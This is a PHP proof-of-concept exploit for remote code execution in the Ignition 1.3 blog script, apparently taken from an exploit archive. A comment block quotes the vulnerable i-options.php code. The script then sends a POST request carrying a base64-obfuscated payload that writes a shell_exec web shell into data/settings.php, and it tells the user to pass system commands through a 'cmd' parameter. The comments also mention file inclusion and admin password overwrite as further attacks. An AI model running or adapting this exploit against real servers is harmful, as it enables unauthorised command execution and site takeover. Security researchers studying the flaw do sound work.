88 lines
No EOL
2.1 KiB
PHP
88 lines
No EOL
2.1 KiB
PHP
<?php
|
|
|
|
/*
|
|
|
|
Ignition 1.3 Remote Code Execution Exploit
|
|
by cOndemned
|
|
download: http://launchpad.net/ignition/trunk/1.3/+download/ignition-1.3.tar.gz
|
|
|
|
|
|
source of i-options.php
|
|
|
|
1. <?php
|
|
2. session_start();
|
|
3. if ($_POST['submit']) {
|
|
4. if ($FH = @fopen('data/settings.php', 'w')) {
|
|
5. @fwrite($FH, '<?php $pass = "'.$_POST['pass'].'";
|
|
6. $uri = "'.$_POST['uri'].'";
|
|
7. $suri = "'.$_POST['suri'].'";
|
|
8. $blogtitle = "'.$_POST['title'].'";
|
|
9. $description = "'.$_POST['description'].'";
|
|
10. $postid = "'.$_POST['id'].'";
|
|
11. $author = "'.$_POST['author'].'";
|
|
12. $skin = "'.$_POST['skin'].'";
|
|
13. $gravatar = "'.$_POST['gravatar'].'";
|
|
14. $twitter = "' . $_POST['twitter'] . '";
|
|
15. $identica = "' . $_POST['identica'] . '";
|
|
16. $book = "' . $_POST['book'] . '";
|
|
17. $game = "' . $_POST['game'] . '";
|
|
18. $language = "' . $_POST['lang'] . '";
|
|
19.
|
|
20. require_once("template.php");
|
|
21. require_once("lang/$language.php");');
|
|
22. #fclose($FH);
|
|
23. }
|
|
|
|
We can overwrite setting.php by simply sending specially crafted POST request,
|
|
and put some evil code into one of the variables. After running my PoC line with
|
|
$language var will be:
|
|
|
|
$language = "en";echo @shell_exec($_GET['cmd']);$wtf="";
|
|
|
|
Where "en" is default language and without filling this field correctly admin
|
|
will see error while trying to access blog index.
|
|
|
|
other attacks scenarios:
|
|
|
|
- attacker can use $_POST['language'] variable to exploit Local File
|
|
Inclusion (lines 18 and 21)
|
|
|
|
- fill $_POST['pass'] with new password (md5 hashed) to overwrite admins
|
|
password
|
|
|
|
- etc...
|
|
*/
|
|
|
|
|
|
$target = 'http://localhost/ignition/';
|
|
|
|
$post = array
|
|
(
|
|
'uri' => $target,
|
|
'suri' => $target,
|
|
'description' => 'Just another lame php blog script owned :<',
|
|
'skin' => 'default',
|
|
'lang' => base64_decode('ZW4iO2VjaG8gQHNoZWxsX2V4ZWMoJF9HRVRbJ2NtZCddKTskd3RmPSI='),
|
|
'submit' => 1
|
|
);
|
|
|
|
$sock = curl_init();
|
|
|
|
curl_setopt_array
|
|
(
|
|
$sock,
|
|
array
|
|
(
|
|
CURLOPT_URL => "$target/i-options.php",
|
|
CURLOPT_RETURNTRANSFER => true,
|
|
CURLOPT_POST => true,
|
|
CURLOPT_POSTFIELDS => http_build_query($post)
|
|
)
|
|
);
|
|
|
|
curl_exec($sock);
|
|
curl_close($sock);
|
|
|
|
echo "Check: $target/data/settings.php?cmd=[system_command]";
|
|
|
|
?>
|